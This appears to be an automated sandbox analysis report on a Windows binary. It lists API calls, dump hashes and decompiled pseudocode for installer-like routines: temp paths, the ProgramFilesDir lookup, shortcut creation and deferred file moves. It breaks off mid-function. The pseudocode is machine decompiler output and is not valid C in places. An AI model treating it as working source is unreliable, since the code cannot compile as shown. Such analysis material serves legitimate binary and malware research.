                • __aulldiv.LIBCMT ref: 00CB06F3
                  • Part of subcall function 00CAA995: GetVersionExW.KERNEL32(?), ref: 00CAA9BA
                • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 00CB071C
                • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 00CB072E
                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00CB073B
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB0751
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB075D
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CB0793
                • __aullrem.LIBCMT ref: 00CB081D
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                • String ID:
                • API String ID: 1247370737-0
                • Opcode ID: 354dcab87a61752574d0d6b8543cd498c13c1d571660e8034443419c44ce8d60
                • Instruction ID: 50488f794caad5e280fc9a7589892114ef95ab98ea79f7a6ed0161862d54f2bd
                • Opcode Fuzzy Hash: 354dcab87a61752574d0d6b8543cd498c13c1d571660e8034443419c44ce8d60
                • Instruction Fuzzy Hash: 6C4117B24083059FC710DF65C880AAFF7E8FF88714F104A2EF69692250EB35E648DB52
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E00CCE2ED(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                				signed int _v8;
                				signed char _v15;
                				char _v16;
                				void _v24;
                				short _v28;
                				char _v31;
                				void _v32;
                				long _v36;
                				intOrPtr _v40;
                				void* _v44;
                				signed int _v48;
                				signed char* _v52;
                				long _v56;
                				int _v60;
                				signed int _t78;
                				signed int _t80;
                				int _t86;
                				void* _t94;
                				long _t97;
                				void _t105;
                				void* _t112;
                				signed int _t116;
                				signed int _t118;
                				signed char _t123;
                				signed char _t128;
                				intOrPtr _t129;
                				signed int _t131;
                				signed char* _t133;
                				intOrPtr* _t135;
                				signed int _t136;
                				void* _t137;
                
                				_t78 =  *0xcdd668; // 0x814d2927
                				_v8 = _t78 ^ _t136;
                				_t80 = _a8;
                				_t118 = _t80 >> 6;
                				_t116 = (_t80 & 0x0000003f) * 0x30;
                				_t133 = _a12;
                				_v52 = _t133;
                				_v48 = _t118;
                				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0xd00420 + _t118 * 4)) + _t116 + 0x18));
                				_v40 = _a16 + _t133;
                				_t86 = GetConsoleCP();
                				_t135 = _a4;
                				_v60 = _t86;
                				 *_t135 = 0;
                				 *((intOrPtr*)(_t135 + 4)) = 0;
                				 *((intOrPtr*)(_t135 + 8)) = 0;
                				while(_t133 < _v40) {
                					_v28 = 0;
                					_v31 =  *_t133;
                					_t129 =  *((intOrPtr*)(0xd00420 + _v48 * 4));
                					_t123 =  *(_t129 + _t116 + 0x2d);
                					if((_t123 & 0x00000004) == 0) {
                						if(( *(E00CC9474(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                							_push(1);
                							_push(_t133);
                							goto L8;
                						} else {
                							if(_t133 >= _v40) {
                								_t131 = _v48;
                								 *((char*)( *((intOrPtr*)(0xd00420 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                								 *( *((intOrPtr*)(0xd00420 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0xd00420 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                							} else {
                								_t112 = E00CC804C( &_v28, _t133, 2);
                								_t137 = _t137 + 0xc;
                								if(_t112 != 0xffffffff) {
                									_t133 =  &(_t133[1]);
                									goto L9;
                								}
                							}
                						}
                					} else {
                						_t128 = _t123 & 0x000000fb;
                						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                						_push(2);
                						_v15 = _t128;
                						 *(_t129 + _t116 + 0x2d) = _t128;
                						_push( &_v16);
                						L8:
                						_push( &_v28);
                						_t94 = E00CC804C();
                						_t137 = _t137 + 0xc;
                						if(_t94 != 0xffffffff) {
                							L9:
                							_t133 =  &(_t133[1]);
                							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                							_v56 = _t97;
                							if(_t97 != 0) {
                								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                									L19:
                									 *_t135 = GetLastError();
                								} else {
                									_t48 = _t135 + 8; // 0xff76e900
                									 *((intOrPtr*)(_t135 + 4)) =  *_t48 - _v52 + _t133;
                									if(_v36 >= _v56) {
                										if(_v31 != 0xa) {
                											goto L16;
                										} else {
                											_t105 = 0xd;
                											_v32 = _t105;
                											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                												goto L19;
                											} else {
                												if(_v36 >= 1) {
                													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
                													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                													goto L16;
                												}
                											}
                										}
                									}
                								}
                							}
                						}
                					}
                					goto L20;
                					L16:
                				}
                				L20:
                				return E00CBE203(_t135, _v8 ^ _t136);
                			}



































                APIs
                • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00CCEA62,00000000,00000000,00000000,00000000,00000000,00CC3FBF), ref: 00CCE32F
                • __fassign.LIBCMT ref: 00CCE3AA
                • __fassign.LIBCMT ref: 00CCE3C5
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00CCE3EB
                • WriteFile.KERNEL32(?,00000000,00000000,00CCEA62,00000000,?,?,?,?,?,?,?,?,?,00CCEA62,00000000), ref: 00CCE40A
                • WriteFile.KERNEL32(?,00000000,00000001,00CCEA62,00000000,?,?,?,?,?,?,?,?,?,00CCEA62,00000000), ref: 00CCE443
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                • String ID:
                • API String ID: 1324828854-0
                • Opcode ID: fdafed9cbb14affce3583e1f53f9df8998e720b2a45836152a963cd023ab35dc
                • Instruction ID: 68eb27a30098725424376e680d436ea308849f9bb4aaa393c9bbfd0f548b6275
                • Opcode Fuzzy Hash: fdafed9cbb14affce3583e1f53f9df8998e720b2a45836152a963cd023ab35dc
                • Instruction Fuzzy Hash: 1C5182B1A00249AFDB14CFA8D885FEEBBF9EF09310F14415EE555E7291D730AA41CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 52%
                			E00CBBB5B(intOrPtr __ebx, void* __ecx) {
                				intOrPtr _t209;
                				void* _t210;
                				intOrPtr _t263;
                				WCHAR* _t277;
                				void* _t279;
                				WCHAR* _t280;
                				void* _t285;
                
                				L0:
                				while(1) {
                					L0:
                					_t263 = __ebx;
                					if(__ebx != 1) {
                						goto L112;
                					}
                					L96:
                					__eax = __ebp - 0x7c84;
                					__edi = 0x800;
                					GetTempPathW(0x800, __ebp - 0x7c84) = __ebp - 0x7c84;
                					E00CAAEA5(__eflags, __ebp - 0x7c84, 0x800) = 0;
                					__esi = 0;
                					_push(0);
                					while(1) {
                						L98:
                						_push( *0xcdd5f8);
                						__ebp - 0x7c84 = E00CA3E41(0xce85fa, __edi, L"%s%s%u", __ebp - 0x7c84);
                						__eax = E00CA9E6B(0xce85fa);
                						__eflags = __al;
                						if(__al == 0) {
                							break;
                						}
                						L97:
                						__esi =  &(__esi->i);
                						__eflags = __esi;
                						_push(__esi);
                					}
                					L99:
                					__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0xce85fa);
                					__eflags =  *(__ebp - 0x5c84);
                					if( *(__ebp - 0x5c84) == 0) {
                						while(1) {
                							L164:
                							_push(0x1000);
                							_t197 = _t285 - 0xe; // 0xffffa36e
                							_t198 = _t285 - 0xd; // 0xffffa36f
                							_t199 = _t285 - 0x5c84; // 0xffff46f8
                							_t200 = _t285 - 0xfc8c; // 0xfffea6f0
                							_push( *((intOrPtr*)(_t285 + 0xc)));
                							_t209 = E00CBA156();
                							_t263 =  *((intOrPtr*)(_t285 + 0x10));
                							 *((intOrPtr*)(_t285 + 0xc)) = _t209;
                							if(_t209 != 0) {
                								_t210 = _t285 - 0x5c84;
                								_t279 = _t285 - 0x1bc8c;
                								_t277 = 6;
                								goto L2;
                							} else {
                								break;
                							}
                							L4:
                							while(E00CB1410(_t285 - 0xfc8c,  *((intOrPtr*)(0xcdd618 + _t280 * 4))) != 0) {
                								_t280 =  &(_t280[0]);
                								if(_t280 < 0xe) {
                									continue;
                								} else {
                									goto L164;
                								}
                							}
                							__eflags = _t280 - 0xd;
                							if(__eflags > 0) {
                								continue;
                							}
                							L8:
                							switch( *((intOrPtr*)(_t280 * 4 +  &M00CBC0D7))) {
                								case 0:
                									L9:
                									__eflags = _t263 - 2;
                									if(_t263 != 2) {
                										goto L164;
                									}
                									L10:
                									_t282 = 0x800;
                									E00CB95F8(_t285 - 0x7c84, 0x800);
                									E00CAA188(E00CAB625(_t285 - 0x7c84, _t285 - 0x5c84, _t285 - 0xdc8c, 0x800), _t263, _t285 - 0x8c8c, 0x800);
                									 *(_t285 - 4) = _t277;
                									E00CAA2C2(_t285 - 0x8c8c, _t285 - 0xdc8c);
                									E00CA6EF9(_t285 - 0x3c84);
                									_push(_t277);
                									_t271 = _t285 - 0x8c8c;
                									_t224 = E00CAA215(_t285 - 0x8c8c, _t276, _t285 - 0x3c84);
                									__eflags = _t224;
                									if(_t224 == 0) {
                										L26:
                										 *(_t285 - 4) =  *(_t285 - 4) | 0xffffffff;
                										E00CAA19E(_t285 - 0x8c8c);
                										goto L164;
                									} else {
                										goto L13;
                										L14:
                										E00CAB1B7(_t271, __eflags, _t285 - 0x7c84, _t285 - 0x103c, _t282);
                										E00CAAEA5(__eflags, _t285 - 0x103c, _t282);
                										_t284 = E00CC2B33(_t285 - 0x7c84);
                										__eflags = _t284 - 4;
                										if(_t284 < 4) {
                											L16:
                											_t252 = E00CAB5E5(_t285 - 0x5c84);
                											__eflags = _t252;
                											if(_t252 != 0) {
                												goto L26;
                											}
                											L17:
                											_t254 = E00CC2B33(_t285 - 0x3c84);
                											__eflags = 0;
                											 *((short*)(_t285 + _t254 * 2 - 0x3c82)) = 0;
                											E00CBE920(_t277, _t285 - 0x3c, _t277, 0x1e);
                											_t287 = _t287 + 0x10;
                											 *((intOrPtr*)(_t285 - 0x38)) = 3;
                											_push(0x14);
                											_pop(_t257);
                											 *((short*)(_t285 - 0x2c)) = _t257;
                											 *((intOrPtr*)(_t285 - 0x34)) = _t285 - 0x3c84;
                											_push(_t285 - 0x3c);
                											 *0xcddef4();
                											goto L18;
                										}
                										L15:
                										_t262 = E00CC2B33(_t285 - 0x103c);
                										__eflags = _t284 - _t262;
                										if(_t284 > _t262) {
                											goto L17;
                										}
                										goto L16;
                										L18:
                										_t229 = GetFileAttributesW(_t285 - 0x3c84);
                										__eflags = _t229 - 0xffffffff;
                										if(_t229 == 0xffffffff) {
                											L25:
                											_push(_t277);
                											_t271 = _t285 - 0x8c8c;
                											_t231 = E00CAA215(_t285 - 0x8c8c, _t276, _t285 - 0x3c84);
                											__eflags = _t231;
                											if(_t231 != 0) {
                												_t282 = 0x800;
                												L13:
                												SetFileAttributesW(_t285 - 0x3c84, _t277);
                												__eflags =  *((char*)(_t285 - 0x2c78));
                												if(__eflags == 0) {
                													goto L18;
                												}
                												goto L14;
                											}
                											goto L26;
                										}
                										L19:
                										_t233 = DeleteFileW(_t285 - 0x3c84);
                										__eflags = _t233;
                										if(_t233 != 0) {
                											goto L25;
                										} else {
                											_t283 = _t277;
                											_push(_t277);
                											goto L22;
                											L22:
                											E00CA3E41(_t285 - 0x103c, 0x800, L"%s.%d.tmp", _t285 - 0x3c84);
                											_t287 = _t287 + 0x14;
                											_t238 = GetFileAttributesW(_t285 - 0x103c);
                											__eflags = _t238 - 0xffffffff;
                											if(_t238 != 0xffffffff) {
                												_t283 = _t283 + 1;
                												__eflags = _t283;
                												_push(_t283);
                												goto L22;
                											} else {
                												_t241 = MoveFileW(_t285 - 0x3c84, _t285 - 0x103c);
                												__eflags = _t241;
                												if(_t241 != 0) {
                													MoveFileExW(_t285 - 0x103c, _t277, 4);
                												}
                												goto L25;
                											}
                										}
                									}
                								case 1:
                									L27:
                									__eflags = __ebx;
                									if(__ebx == 0) {
                										__eax =  *0xcfce0c;
                										__eflags =  *0xcfce0c;
                										__ebx = __ebx & 0xffffff00 |  *0xcfce0c == 0x00000000;
                										__eflags = __bl;
                										if(__bl == 0) {
                											__eax =  *0xcfce0c;
                											_pop(__ecx);
                											_pop(__ecx);
                										}
                										L30:
                										__bh =  *((intOrPtr*)(__ebp - 0xd));
                										__eflags = __bh;
                										if(__eflags == 0) {
                											__eax = __ebp + 0xc;
                											_push(__ebp + 0xc);
                											__esi = E00CBA2AE(__ecx, __edx, __eflags);
                											__eax =  *0xcfce0c;
                										} else {
                											__esi = __ebp - 0x5c84;
                										}
                										__eflags = __bl;
                										if(__bl == 0) {
                											__edi = __eax;
                										}
                										L35:
                										__eax = E00CC2B33(__esi);
                										__eax = __eax + __edi;
                										_push(__eax);
                										_push( *0xcfce0c);
                										__eax = E00CC2B5E(__ecx, __edx);
                										__esp = __esp + 0xc;
                										__eflags = __eax;
                										if(__eax != 0) {
                											 *0xcfce0c = __eax;
                											__eflags = __bl;
                											if(__bl != 0) {
                												__ecx = 0;
                												__eflags = 0;
                												 *__eax = __cx;
                											}
                											__eax = E00CC66ED(__eax, __esi);
                											_pop(__ecx);
                											_pop(__ecx);
                										}
                										__eflags = __bh;
                										if(__bh == 0) {
                											__eax = L00CC2B4E(__esi);
                										}
                									}
                									goto L164;
                								case 2:
                									L41:
                									__eflags = __ebx;
                									if(__ebx == 0) {
                										__ebp - 0x5c84 = SetWindowTextW( *(__ebp + 8), __ebp - 0x5c84);
                									}
                									goto L164;
                								case 3:
                									L43:
                									__eflags = __ebx;
                									if(__ebx != 0) {
                										goto L164;
                									}
                									L44:
                									__eflags =  *0xce9602 - __di;
                									if( *0xce9602 != __di) {
                										goto L164;
                									}
                									L45:
                									__eax = 0;
                									__edi = __ebp - 0x5c84;
                									_push(0x22);
                									 *(__ebp - 0x103c) = __ax;
                									_pop(__eax);
                									__eflags =  *(__ebp - 0x5c84) - __ax;
                									if( *(__ebp - 0x5c84) == __ax) {
                										__edi = __ebp - 0x5c82;
                									}
                									__eax = E00CC2B33(__edi);
                									__esi = 0x800;
                									__eflags = __eax - 0x800;
                									if(__eax >= 0x800) {
                										goto L164;
                									} else {
                										L48:
                										__eax =  *__edi & 0x0000ffff;
                										_push(0x5c);
                										_pop(__ecx);
                										__eflags = ( *__edi & 0x0000ffff) - 0x2e;
                										if(( *__edi & 0x0000ffff) != 0x2e) {
                											L52:
                											__eflags = __ax - __cx;
                											if(__ax == __cx) {
                												L64:
                												__ebp - 0x103c = E00CAFAB1(__ebp - 0x103c, __edi, __esi);
                												__ebx = 0;
                												__eflags = 0;
                												L65:
                												_push(0x22);
                												_pop(__eax);
                												__eax = __ebp - 0x103c;
                												__eax = E00CC0D9B(__ebp - 0x103c, __ebp - 0x103c);
                												_pop(__ecx);
                												_pop(__ecx);
                												__eflags = __eax;
                												if(__eax != 0) {
                													__eflags =  *((intOrPtr*)(__eax + 2)) - __bx;
                													if( *((intOrPtr*)(__eax + 2)) == __bx) {
                														__ecx = 0;
                														__eflags = 0;
                														 *__eax = __cx;
                													}
                												}
                												__eax = __ebp - 0x103c;
                												__edi = 0xce9602;
                												E00CAFAB1(0xce9602, __ebp - 0x103c, __esi) = __ebp - 0x103c;
                												__eax = E00CB9FFC(__ebp - 0x103c, __esi);
                												__esi = GetDlgItem( *(__ebp + 8), 0x66);
                												__ebp - 0x103c = SetWindowTextW(__esi, __ebp - 0x103c); // executed
                												__ebx =  *0xcddf7c;
                												__eax = SendMessageW(__esi, 0x143, __ebx, 0xce9602); // executed
                												__eax = __ebp - 0x103c;
                												__eax = E00CC2B69(__ebp - 0x103c, 0xce9602, __eax);
                												_pop(__ecx);
                												_pop(__ecx);
                												__eflags = __eax;
                												if(__eax != 0) {
                													__ebp - 0x103c = 0;
                													__eax = SendMessageW(__esi, 0x143, 0, __ebp - 0x103c);
                												}
                												goto L164;
                											}
                											L53:
                											__eflags = __ax;
                											if(__ax == 0) {
                												L55:
                												__eax = __ebp - 0x18;
                												__ebx = 0;
                												_push(__ebp - 0x18);
                												_push(1);
                												_push(0);
                												_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
                												_push(0x80000002);
                												__eax =  *0xcddea8();
                												__eflags = __eax;
                												if(__eax == 0) {
                													__eax = __ebp - 0x14;
                													 *(__ebp - 0x14) = 0x1000;
                													_push(__ebp - 0x14);
                													__eax = __ebp - 0x103c;
                													_push(__ebp - 0x103c);
                													__eax = __ebp - 0x1c;
                													_push(__ebp - 0x1c);
                													_push(0);
                													_push(L"ProgramFilesDir");
                													_push( *(__ebp - 0x18));
                													__eax =  *0xcddea4();
                													_push( *(__ebp - 0x18));
                													 *0xcdde84() =  *(__ebp - 0x14);
                													__ecx = 0x7ff;
                													__eax =  *(__ebp - 0x14) >> 1;
                													__eflags = __eax - 0x7ff;
                													if(__eax >= 0x7ff) {
                														__eax = 0x7ff;
                													}
                													__ecx = 0;
                													__eflags = 0;
                													 *((short*)(__ebp + __eax * 2 - 0x103c)) = __cx;
                												}
                												__eflags =  *(__ebp - 0x103c) - __bx;
                												if( *(__ebp - 0x103c) != __bx) {
                													__eax = __ebp - 0x103c;
                													__eax = E00CC2B33(__ebp - 0x103c);
                													_push(0x5c);
                													_pop(__ecx);
                													__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x103e)) - __cx;
                													if(__eflags != 0) {
                														__ebp - 0x103c = E00CAFA89(__eflags, __ebp - 0x103c, "\\", __esi);
                													}
                												}
                												__esi = E00CC2B33(__edi);
                												__eax = __ebp - 0x103c;
                												__eflags = __esi - 0x7ff;
                												__esi = 0x800;
                												if(__eflags < 0) {
                													__ebp - 0x103c = E00CAFA89(__eflags, __ebp - 0x103c, __edi, 0x800);
                												}
                												goto L65;
                											}
                											L54:
                											__eflags =  *((short*)(__edi + 2)) - 0x3a;
                											if( *((short*)(__edi + 2)) == 0x3a) {
                												goto L64;
                											}
                											goto L55;
                										}
                										L49:
                										__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
                										if( *((intOrPtr*)(__edi + 2)) != __cx) {
                											goto L52;
                										}
                										L50:
                										__edi = __edi + 4;
                										__ebx = 0;
                										__eflags =  *__edi - __bx;
                										if( *__edi == __bx) {
                											goto L164;
                										}
                										L51:
                										__ebp - 0x103c = E00CAFAB1(__ebp - 0x103c, __edi, 0x800);
                										goto L65;
                									}
                								case 4:
                									L70:
                									__eflags =  *0xce95fc - 1;
                									__eflags = __eax - 0xce95fc;
                									 *__edi =  *__edi + __ecx;
                									__eflags =  *(__ebx + 6) & __bl;
                									 *__eax =  *__eax + __al;
                									__eflags =  *__eax;
                								case 5:
                									L75:
                									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
                									__ecx = 0;
                									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
                									__eflags = __eax;
                									if(__eax == 0) {
                										L82:
                										 *0xce75d2 = __cl;
                										 *0xce75d3 = 1;
                										goto L164;
                									}
                									L76:
                									__eax = __eax - 0x30;
                									__eflags = __eax;
                									if(__eax == 0) {
                										L80:
                										 *0xce75d2 = __cl;
                										L81:
                										 *0xce75d3 = __cl;
                										goto L164;
                									}
                									L77:
                									__eax = __eax - 1;
                									__eflags = __eax;
                									if(__eax == 0) {
                										goto L82;
                									}
                									L78:
                									__eax = __eax - 1;
                									__eflags = __eax;
                									if(__eax != 0) {
                										goto L164;
                									}
                									L79:
                									 *0xce75d2 = 1;
                									goto L81;
                								case 6:
                									L88:
                									__eflags = __ebx - 4;
                									if(__ebx != 4) {
                										goto L92;
                									}
                									L89:
                									__eax = __ebp - 0x5c84;
                									__eax = E00CC2B69(__ebp - 0x5c84, __eax, L"<>");
                									_pop(__ecx);
                									_pop(__ecx);
                									__eflags = __eax;
                									if(__eax == 0) {
                										goto L92;
                									}
                									L90:
                									_push(__edi);
                									goto L91;
                								case 7:
                									goto L0;
                								case 8:
                									L116:
                									__eflags = __ebx - 3;
                									if(__ebx == 3) {
                										__eflags =  *(__ebp - 0x5c84) - __di;
                										if(__eflags != 0) {
                											__eax = __ebp - 0x5c84;
                											_push(__ebp - 0x5c84);
                											__eax = E00CC668C(__ebx, __edi);
                											_pop(__ecx);
                											 *0xcfde1c = __eax;
                										}
                										__eax = __ebp + 0xc;
                										_push(__ebp + 0xc);
                										 *0xcfde18 = E00CBA2AE(__ecx, __edx, __eflags);
                									}
                									 *0xcf5d03 = 1;
                									goto L164;
                								case 9:
                									L121:
                									__eflags = __ebx - 5;
                									if(__ebx != 5) {
                										L92:
                										 *0xcfde20 = 1;
                										goto L164;
                									}
                									L122:
                									_push(1);
                									L91:
                									__eax = __ebp - 0x5c84;
                									_push(__ebp - 0x5c84);
                									_push( *(__ebp + 8));
                									__eax = E00CBC431();
                									goto L92;
                								case 0xa:
                									L123:
                									__eflags = __ebx - 6;
                									if(__ebx != 6) {
                										goto L164;
                									}
                									L124:
                									__eax = 0;
                									 *(__ebp - 0x2c3c) = __ax;
                									__eax =  *(__ebp - 0x1bc8c) & 0x0000ffff;
                									__eax = E00CC59C0( *(__ebp - 0x1bc8c) & 0x0000ffff);
                									_push(0x800);
                									__eflags = __eax - 0x50;
                									if(__eax == 0x50) {
                										_push(0xcfad0a);
                										__eax = __ebp - 0x2c3c;
                										_push(__ebp - 0x2c3c);
                										__eax = E00CAFAB1();
                										 *(__ebp - 0x14) = 2;
                									} else {
                										__eflags = __eax - 0x54;
                										__eax = __ebp - 0x2c3c;
                										if(__eflags == 0) {
                											_push(0xcf9d0a);
                											_push(__eax);
                											__eax = E00CAFAB1();
                											 *(__ebp - 0x14) = 7;
                										} else {
                											_push(0xcfbd0a);
                											_push(__eax);
                											__eax = E00CAFAB1();
                											 *(__ebp - 0x14) = 0x10;
                										}
                									}
                									__eax = 0;
                									 *(__ebp - 0x9c8c) = __ax;
                									 *(__ebp - 0x1c3c) = __ax;
                									__ebp - 0x19c8c = __ebp - 0x6c84;
                									__eax = E00CC4D7E(__ebp - 0x6c84, __ebp - 0x19c8c);
                									_pop(__ecx);
                									_pop(__ecx);
                									_push(0x22);
                									_pop(__ebx);
                									__eflags =  *(__ebp - 0x6c84) - __bx;
                									if( *(__ebp - 0x6c84) != __bx) {
                										L132:
                										__ebp - 0x6c84 = E00CA9E6B(__ebp - 0x6c84);
                										__eflags = __al;
                										if(__al != 0) {
                											goto L149;
                										}
                										L133:
                										__ebx = __edi;
                										__esi = __ebp - 0x6c84;
                										__eflags =  *(__ebp - 0x6c84) - __bx;
                										if( *(__ebp - 0x6c84) == __bx) {
                											goto L149;
                										}
                										L134:
                										_push(0x20);
                										_pop(__ecx);
                										do {
                											L135:
                											__eax = __esi->i & 0x0000ffff;
                											__eflags = __ax - __cx;
                											if(__ax == __cx) {
                												L137:
                												__edi = __eax;
                												__eax = 0;
                												__esi->i = __ax;
                												__ebp - 0x6c84 = E00CA9E6B(__ebp - 0x6c84);
                												__eflags = __al;
                												if(__al == 0) {
                													L144:
                													__esi->i = __di;
                													L145:
                													_push(0x20);
                													_pop(__ecx);
                													__edi = 0;
                													__eflags = 0;
                													goto L146;
                												}
                												L138:
                												_push(0x2f);
                												_pop(__eax);
                												__ebx = __esi;
                												__eflags = __di - __ax;
                												if(__di != __ax) {
                													L140:
                													_push(0x20);
                													_pop(__eax);
                													do {
                														L141:
                														__esi =  &(__esi->i);
                														__eflags = __esi->i - __ax;
                													} while (__esi->i == __ax);
                													_push(__esi);
                													__eax = __ebp - 0x1c3c;
                													L143:
                													_push(__eax);
                													__eax = E00CC4D7E();
                													_pop(__ecx);
                													_pop(__ecx);
                													 *__ebx = __di;
                													goto L145;
                												}
                												L139:
                												 *(__ebp - 0x1c3c) = __ax;
                												__eax =  &(__esi->i);
                												_push( &(__esi->i));
                												__eax = __ebp - 0x1c3a;
                												goto L143;
                											}
                											L136:
                											_push(0x2f);
                											_pop(__edx);
                											__eflags = __ax - __dx;
                											if(__ax != __dx) {
                												goto L146;
                											}
                											goto L137;
                											L146:
                											__esi =  &(__esi->i);
                											__eflags = __esi->i - __di;
                										} while (__esi->i != __di);
                										__eflags = __ebx;
                										if(__ebx != 0) {
                											__eax = 0;
                											__eflags = 0;
                											 *__ebx = __ax;
                										}
                										goto L149;
                									} else {
                										L130:
                										__ebp - 0x19c8a = __ebp - 0x6c84;
                										E00CC4D7E(__ebp - 0x6c84, __ebp - 0x19c8a) = __ebp - 0x6c82;
                										_push(__ebx);
                										_push(__ebp - 0x6c82);
                										__eax = E00CC0BB8(__ecx);
                										__esp = __esp + 0x10;
                										__eflags = __eax;
                										if(__eax != 0) {
                											__ecx = 0;
                											 *__eax = __cx;
                											__ebp - 0x1c3c = E00CC4D7E(__ebp - 0x1c3c, __ebp - 0x1c3c);
                											_pop(__ecx);
                											_pop(__ecx);
                										}
                										L149:
                										__eflags =  *(__ebp - 0x11c8c);
                										__ebx = 0x800;
                										if( *(__ebp - 0x11c8c) != 0) {
                											_push(0x800);
                											__eax = __ebp - 0x9c8c;
                											_push(__ebp - 0x9c8c);
                											__eax = __ebp - 0x11c8c;
                											_push(__ebp - 0x11c8c);
                											__eax = E00CAAED7();
                										}
                										_push(__ebx);
                										__eax = __ebp - 0xbc8c;
                										_push(__ebp - 0xbc8c);
                										__eax = __ebp - 0x6c84;
                										_push(__ebp - 0x6c84);
                										__eax = E00CAAED7();
                										__eflags =  *(__ebp - 0x2c3c);
                										if(__eflags == 0) {
                											__ebp - 0x2c3c = E00CBA24E(__ecx, __ebp - 0x2c3c,  *(__ebp - 0x14));
                										}
                										__ebp - 0x2c3c = E00CAAEA5(__eflags, __ebp - 0x2c3c, __ebx);
                										__eflags =  *((short*)(__ebp - 0x17c8c));
                										if(__eflags != 0) {
                											__ebp - 0x17c8c = __ebp - 0x2c3c;
                											E00CAFA89(__eflags, __ebp - 0x2c3c, __ebp - 0x17c8c, __ebx) = __ebp - 0x2c3c;
                											__eax = E00CAAEA5(__eflags, __ebp - 0x2c3c, __ebx);
                										}
                										__ebp - 0x2c3c = __ebp - 0xcc8c;
                										__eax = E00CC4D7E(__ebp - 0xcc8c, __ebp - 0x2c3c);
                										__eflags =  *(__ebp - 0x13c8c);
                										__eax = __ebp - 0x13c8c;
                										_pop(__ecx);
                										_pop(__ecx);
                										if(__eflags == 0) {
                											__eax = __ebp - 0x19c8c;
                										}
                										__ebp - 0x2c3c = E00CAFA89(__eflags, __ebp - 0x2c3c, __ebp - 0x2c3c, __ebx);
                										__eax = __ebp - 0x2c3c;
                										__eflags = E00CAB153(__ebp - 0x2c3c);
                										if(__eflags == 0) {
                											L159:
                											__ebp - 0x2c3c = E00CAFA89(__eflags, __ebp - 0x2c3c, L".lnk", __ebx);
                											goto L160;
                										} else {
                											L158:
                											__eflags = __eax;
                											if(__eflags == 0) {
                												L160:
                												_push(1);
                												__eax = __ebp - 0x2c3c;
                												_push(__ebp - 0x2c3c);
                												E00CA9D3A(__ecx, __ebp) = __ebp - 0xbc8c;
                												__ebp - 0xac8c = E00CC4D7E(__ebp - 0xac8c, __ebp - 0xbc8c);
                												_pop(__ecx);
                												_pop(__ecx);
                												__ebp - 0xac8c = E00CAB98D(__eflags, __ebp - 0xac8c);
                												__ecx =  *(__ebp - 0x1c3c) & 0x0000ffff;
                												__eax = __ebp - 0x1c3c;
                												__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff);
                												__edx = __ebp - 0x9c8c;
                												__esi = __ebp - 0xac8c;
                												asm("sbb ecx, ecx");
                												__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c;
                												 *(__ebp - 0x9c8c) & 0x0000ffff =  ~( *(__ebp - 0x9c8c) & 0x0000ffff);
                												asm("sbb eax, eax");
                												__eax =  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c;
                												 *(__ebp - 0xac8c) & 0x0000ffff =  ~( *(__ebp - 0xac8c) & 0x0000ffff);
                												__eax = __ebp - 0x15c8c;
                												asm("sbb edx, edx");
